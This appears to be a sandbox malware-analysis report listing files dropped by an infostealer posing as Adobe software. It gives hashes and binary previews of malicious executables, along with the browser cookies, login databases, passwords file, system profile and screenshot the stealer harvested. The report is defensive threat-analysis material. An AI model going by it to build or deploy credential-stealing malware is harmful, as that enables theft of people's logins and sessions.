Preview:	PK.........J\|X................Cookies\..PK.........J\|XQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E..l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3Ap.U5UX....Z.g:e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d\|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O\|.....>K......L...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u\|....v...3.;L..U?..b.....u....... .......F...P.a...\|R3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym

C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6706248
Entropy (8bit):	7.996208583398931
Encrypted:	true
SSDEEP:	196608:91O5ah8iPltHwlkcVCsVRW3VIsTOhiP+A1TCvFDcqO:3O5ah8iDD0C44lIsihixTCvFDlO
MD5:	2CD533891AF666A2EC525BFE8B3E4E7A
SHA1:	B16D10AB6B8077A51F9198430A1B810110A8678E
SHA-256:	B892359F1812D30751D160B0CAA6B3ABC4D1AA1B099909C95E68E58B55FE88C3
SHA-512:	5905161FC2D29066E209B5C7B7AFC38CC2FE05301D8C4E07797DD2033249E6B602FD9A7FD39D0B49FBC1DBCD2D509869AF464174150816816C1FBB43157D0611
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\data\config.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe
File Type:	data
Category:	dropped
Size (bytes):	952892
Entropy (8bit):	7.999787642844756
Encrypted:	true
SSDEEP:	24576:f43HOmgFHhIa1iyvy55+mU9hPnJdCm3fMX4FTWLyxJaH/+dK:QbgNqa1Na55+mWBnJ7kX4VWLyxJg/+dK
MD5:	C8CC3ECF5F263345460E3566620A5CE9
SHA1:	DFAE284DD3E5EB2CA376C4717401A578E7FC6378
SHA-256:	5E8C2CC87ACB0C3987408AA8797F1F83B1AACB64CBC6077C81332C1E7016D8E1
SHA-512:	767F7462135ACDAB4C3C58D6A8C0152B48A6996957096AF5A3C50269A8C1A39A9148AFD397695488878B576B8A4CF1702CE077BB5FA130E29027474A9DC0CE2B
Malicious:	false
Reputation:	unknown
Preview:	.. .!,X..q....$.\..x._...W..u.Z.3rY....P.;.#OLFs<..<.._3....rd\..f..........9..w/pn...k.DK.....$...".......ob.V....,.L.V.j6.B.#....NUJ{.C... ...HB.yZX..8..z.}...9.B-.L.T.0..%~.....]\3 ..f.+...........3}.g.u.S...-(A?.>.dv[....a.=.~.......p&.6.z!..XO..X......Zml.\......X.X.JBReD....t..^OG.@U.JwP....8..}68.,..l..V^.+-..^...!.3.]:{,...#...W/.l....+.....T..?L...i4.(....cl...D..)a...Q.....^oG.J........4..k.g@..$A8..$.$<..v]....H.7.h...d?..P..,t/....`...>]..T`l....ee..f.p.'......,!6..:...U.?e3.:..b=/.OX?M......c.)......W.......,..(&...1!9.9D...N..}...D....D.P.....-..t....;......<..H\|3...WU..~.......YT2....-....t#...l...z.w.qldW.xt..6.......Y5....`....\,.SB.*<E....u..i....3.....H..r...L7E6.G.Y&cX...L_....L...\..y...Aw'.8.E.:.u...$[.{g.3.A..j.......{.0.,x\R:......;G'k...3j+0m.m..e.&`...y..,.]L.....-.y.ny.k\`... ....T.~q.G.!H~>zu.T]..hG.ju......0......Z.$...k...:....)}K~.U.g.'Hvn..Z..N....q.N&w..$..l..~.Dt.h........7....32...#.._.S..b..l..KrH..

C:\Users\user\AppData\Local\Temp\7zSB2BD.tmp\Install.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7110144
Entropy (8bit):	7.745506029517793
Encrypted:	false
SSDEEP:	196608:rhL6lDB7tbKGZ9eBiigYAjtRHCzUBH3pCD1:rAlptbTZ8iiMJGUB5Cp
MD5:	D6EA860C7658AEC47FB494C6D92F39F6
SHA1:	0DD0A34FC875B7A8EADC9D55C0339AD6BF2DA4A2
SHA-256:	855F94DCA60AA50E5BFD46CB62D3D8EF9CBE55C5F0D2B5FFD85006B7C6032F7F
SHA-512:	A4045B237D851664C6218FDE1ECFF87CF1CA3E40788400F83552C5A698FC4AE7994DF4A207D4ABC348D9BE3DA1A73F3FFDEB810304A853678A880FE3641111F3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............h.h.h...h....h...N.h.\I..h.i.h.4(..h.4(..h.4(..h.4(..h.Rich..h.................PE..L...C..`.....................\|a...................@...........................l.....9Pm...@...........................l.......l.......l. ....................0l..Z..................................x.k.@.............l..............................text............................... ..`.data.....`.......`.................@....idata........l.......k.............@..@.reloc...Z...0l..\....l.............@..B.rsrc... .....l......rl.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FHCGHJDBFI.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109056
Entropy (8bit):	7.600369754192578
Encrypted:	false
SSDEEP:	1536:lIpbrxKOcuS11Phbiyn2TCdfGyJVGJkyrt517EwM+UPpe5xKOcuS11Phbiyn2TCf:KpbrsISnRGPJkGt74GsISnRF
MD5:	FE380780B5C35BD6D54541791151C2BE
SHA1:	7FE3A583CF91474C733F85CEBF3C857682E269E1
SHA-256:	B64A84D1F88E4E78464A1901C1CB5BBD5F00BB73203D719E64E072157A087B53
SHA-512:	BA05BA8AA13C4BC1CF98FBF6C08B021E8B19354098E0397FC8E1E5D3DCCE367C1063203F24E50D0973193F6535681D0A43486E5DADE5D112853B7A2FE8739B6C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...JE............"...0..2...v.......Q... ...`....@.. ....................................`.................................7Q..O....`.. s...........................P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc... s...`...t...4..............@..@.reloc..............................@..B................kQ......H.......d0...9...........j..............................................>. 4......(....2......o....:........o.....0..,........o....r...p $...........%...%....o....t....&...o......(....J.r!..p.s....(....Js....%o....o....&..( ...6.(!....(.......0..$........{....,...}....rK..p.s.......("...f..3...t....}......}......(#....~....-.r...p.....($...o%...s&........~.....~............~......('...Vs....((...t...........{...."..}....*..0..G.......s).....(.......+....

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\adobecMHa5Np_iOYp\Cookies\Chrome_Default.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	6085
Entropy (8bit):	6.038274200863744
Encrypted:	false
SSDEEP:	96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
MD5:	ACB5AD34236C58F9F7D219FB628E3B58
SHA1:	02E39404CA22F1368C46A7B8398F5F6001DB8F5C
SHA-256:	05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
SHA-512:	5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
Malicious:	false
Reputation:	unknown
Preview:	.google.com.TRUE./.TRUE.1712145003.NID.ENC893_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

C:\Users\user\AppData\Local\Temp\adobecMHa5Np_iOYp\History\Firefox_fqs92o4p.default-release.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112
Entropy (8bit):	4.911305722693245
Encrypted:	false
SSDEEP:	3:N8DSLvIJiMgTE2WdkQUl7R8DSLvIJiMhKVX3L2WdkQUlv:2OLciodq7R8OLciA8dqv
MD5:	978B9515D3688A43726604AC169DF379
SHA1:	D61293AB99332FC45CAE37D78AB17A5DA5BCD189
SHA-256:	CDEF3FB1CE312E4B67DC5F1B1F9FB551241C08564FDB26AFA4CBF448BB02EA65
SHA-512:	86146AA576129B73743B1EBC0BC60880FDA58A11498048B3C68284C4520F1ADC324D016696B0E995A51AC56966E0F38B0AF12458A986868701C6AAAA89C829CB
Malicious:	false
Reputation:	unknown
Preview:	https://www.mozilla.org/privacy/firefox/.1696333827..https://www.mozilla.org/en-US/privacy/firefox/.1696333827..

C:\Users\user\AppData\Local\Temp\adobecMHa5Np_iOYp\information.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	6994
Entropy (8bit):	5.457038217558349
Encrypted:	false
SSDEEP:	96:xz6S+7rRsTXcT4Aisph+9hcBUQHQMpx2PzK9hdrG0sCANUbg3x:x2S0uTXvAtphWhcBzHQMqPzTB
MD5:	A5E997E7F886B2BC61ADFC9344F2C160
SHA1:	779BD4D820A817ECAF23B6AE52C5537F3A6C21E1
SHA-256:	5DA0A4591326CFC41BB3C5CF2DC5B5561C798AA5266D8C172FA9C924C7ED6AAD
SHA-512:	5D08E22B3CF46D4800C571B9A7F33749486F1738FABC0B9BE73C9102AF954B8149D651C2B55B39B274D25DB975F66308939DABAEE6160E602B2CE91E3EB10F6E
Malicious:	false
Reputation:	unknown
Preview:	Build: default..Version: 1.8....Date: Thu Mar 28 09:16:06 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 8b6de1d93ae91755af85f65884ad8a06....Path: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobecMHa5Np_iOYp....IP: 102.165.48.43..Location: US, Washington D.C...ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 910646 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 28/3/2024 9:16:6..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [324]..csrss.exe [408]..wininit.exe [484]..csrss.exe [492]..winlogon.exe [552]..services.exe [620]..lsass.exe [628]..svchost.exe [752]..fontdr

C:\Users\user\AppData\Local\Temp\adobecMHa5Np_iOYp\passwords.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	2.518316437186352
Encrypted:	false
SSDEEP:	48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
MD5:	B3E9D0E1B8207AA74CB8812BAAF52EAE
SHA1:	A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
SHA-256:	4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
SHA-512:	B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
Malicious:	false
Reputation:	unknown
Preview:	................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\adobecMHa5Np_iOYp\screenshot.png

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	664100
Entropy (8bit):	7.924755841696172
Encrypted:	false
SSDEEP:	12288:FuGHxTvIyDEaJhK7yT9h5a9fajj2agX2Jy5qQt4WjPltBd7UQsFuKCBU7A66Q:FuGRTxgandYtajSagG05qQtfrbVb6J
MD5:	ED690BEE55D8C67582D4D58C6F765B77
SHA1:	EEAF0A18472CE5BCD61AD2A27A9EE02C95FE48CF
SHA-256:	2A32E36D3D0D9688EB71296E43FAAA1C7945397E307573606BA4F066E95F1CC0
SHA-512:	F762A693FE873BBC2347803AEE6828A02BBCAD4CA7C2395F02C38FFAA291B56CD2EB4F75144B97A058F55321E94F16ACF50CFB05987C44DAC51C7ABC4E4AE40F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g..Wu...]'.w_......~.........XN.&(.@.."..$...&...`..&..l...I.r@.....%09......Y...U.j.#.u.x.Zk...UG..3.z....t..[S...J..2...u...d..}...;l.a...~F.(....o...].R.\|.E./.,.l..K....k.........%.c.....K/....W../..~e...u.....L../..`.y.g..;.d.9=.g.1....=...b.O7..O.4ai......b..oy......?7.K...iFO..mO..[z.gW1~.m3Yz....`\|^9s.l{.g&,=.....Om...n...Xz......g..a..?....-a..J.&.?.c..=j6..].W.....l{D...?R......~x..?......v..so..]K\o.,=.C.<...=.C..........o.v<.C..s>..m......H,....~{.R'.9c\|......g.....K\|[..g....../.x@9k..y......8..~....g.3..}..~.U.....bn.Y7......._.9....._.-.v]7>..nt.5uN\|...w+1.B=.3o.v..]e.A..1..G']Us...s.'_]..[*...B...rm...r...m'..IWW...j..}....e.k.w.R..\.=.n\|.u.v..}N...t.+.....v.Z>.....W.v.rue...s.q/#1......;.{e.]..~b9..r....r+8../...c.[.v....r....wE..#.tl9....G..[:.u...}...G^>...s.ql97........;../...G..#...Y>..Y'.......y..z.C..._V

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\02zdBXl47cvzcookies.sqlite

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\1emhAvGvVjDMLogin Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\3Yu4p4OXIzM9Login Data For Account

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\3b6N2Xdh3CYwplaces.sqlite

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\3yY_1ytrcCskHistory

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\5fvkN5qokTSsCookies

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\CDNhkFw_T1PhWeb Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\D87fZN3R3jFeplaces.sqlite

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\heidicMHa5Np_iOYp\D_aIWNwiPMXbWeb Data

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
